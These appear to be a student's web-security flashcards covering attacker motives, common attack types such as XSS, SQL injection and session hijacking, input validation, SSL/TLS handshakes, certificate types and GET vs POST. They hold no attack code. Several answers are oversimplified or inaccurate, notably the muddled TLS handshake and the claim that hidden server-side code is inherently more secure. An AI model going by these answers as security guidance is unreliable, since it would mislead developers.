Web Security Flashcards

1
Q

Why would an attacker target my site?

A
  • Read private data (user names, passwords, credit card numbers, grades, prices)
  • Change data (change a student’s grades, prices of products, passwords)
  • Spread viruses and other malware
  • Damage or shut down the site, so that it cannot be successfully used by others
  • Harm the reputation or credibility of the organization running the site
  • Spoofing (pretending to be someone they are not)
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Some Security Recommendations:

A
  • Examining page source code on the server-side script
  • Examine network traffic and AJAX requests
  • Listen to white hat hackers
  • Assume that the attacker knows about web dev and has the same tools you have
  • COMPLEXITY INCREASES SECURITY RISK

Awareness + Protection = Security

assume nothing; trust no one

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

A selection of attack types

A
  • Denial of Service (DoS): Making a server unavailable by bombarding it with requests
  • Social Engineering: Tricking a user into compromising the security of a site (e.g. phishing)
  • Privilege Escalation: Causing code to run as a “privileged” context (e.g. “root”)
  • Information Leakage: Allowing an attacker to look at data meant to be confidential
  • Man-in-the-Middle: Intercept, and read and/or manipulate that traffic
  • Session Hijacking: Stealing another user’s session cookie to masquerade as that user
    • an attacker can listen to the network, get your session ID cookie, and make requests to the same server with that same session ID cookie to masquerade as you (example: Firesheep)
  • Cross-Site Scripting (XSS) or HTML Injection: Inserting malicious HTML or JavaScript content into a web page
    • injected script code can:
      • masquerade as the original page and trick the user into entering sensitive data
      • steal the user’s cookies
      • masquerade as the user and submit data on their behalf (submit forms, click buttons, etc.)
  • SQL Injection: Inserting malicious SQL query code to reveal or modify sensitive data
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Securing against HTML injection / XSS / SQL injection

A
  • disallow harmful characters
    • HTML injection is impossible without < >
  • allow them, but escape them
    • preventing blank values (such as for email)
    • ensuring the type of the value (integer, date, etc.)
    • ensuring the format and the range of the values (e.g., postcode format)
    • ensuring certain combinations of values fit together properly
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Securing against SQL injection specifically

A
  • escape the string before you include it in your query
  • replaces ‘ with ', etc., and surrounds with quotes
  • sanitising user input
  • using prepared statements (i.e. pre-compiled SQL query template that can be filled)
  • limiting database permissions (e.g. principle of least privilege)
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Client-Side Validation vs. Sever-Side Validation

+ what is used respectively

A

Client-Side Validation

Two ways:

  • Implicit: Having the browser automatically enforce certain limitations (e.g. choosing a buttons rather than a text field).
  • Explicit: the validation is done by the page’s author through JavaScript.

Server-Side Validation

  • Regular Expressions are used in server-side validation. (A sequence of characters that define a search pattern.)
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

definition and characterstics of SSL and TLS

A

asymmetric cryptographic protocols designed for secure communication over a computer network.

  • To use SSL a certificate by a certain authority is required and can cost up to couple of hundred dollars.
  • Using SSL may have an impact on performance because encrypting and decrypting messages consume CPU time and memory.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

explain the SSL or TLS handshake

between an SSL client and SSL sever

A
  1. Client contacts sever
  2. Server responds with server certificate
  3. Client checks certificate and cryptographic parameters
  4. Client sends secret key encrypted by public key + client certificate
  5. Server verifies client certificate
  6. Client and server signal that everything is checked
  7. Message is shared with shared secret key
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

list 3 types of certificates

A

Domain Validation (DV) - Certificate Authority (CA) checks only the domain name.

Organisation Validation (OV) - CA checks domain and vets some information about organisation.

Extended Validation (EV) - CA checks domain and conducts thorough vetting of multiple aspects of the organisation, according to strict guidelines.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

How are the HTTP POST and GET methods related to security?

A

In forms,

HTTP POST requests supply additional data from the client (browser) to the server in the message body.

GET requests holds all data in URL, which is much less secure.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

What might different error messages in browsers reveal to attackers?

A

error 403 shows that the source exist and but is forbidden

this information can be useful for attackers

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

How can the page source be used for an attack?

A

the page source of websites might reveal valuable information for hackers, like commented out sections revealing person data

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

server-side vs. client-side security

A

server side languages are not seen by users — more secure

(JavaScript is both sever and client slide)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

What are botnes?

(NOT NEEDED FOR EXAM)

A

When a hacker gained access to your computer/website, it will build in a backdoor for future access - creating an army of zombie computers that can perform any kind of task like data crunching, theft, etc.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

In order to write secure code, we must assume:

A
  • invalid input
  • evil users
  • incompetent users
  • everything that can go wrong, will go wrong
  • everybody is out to get you
  • botnets, hackers, script kiddies, KGB, etc. are out there
How well did you know this?
1
Not at all
2
3
4
5
Perfectly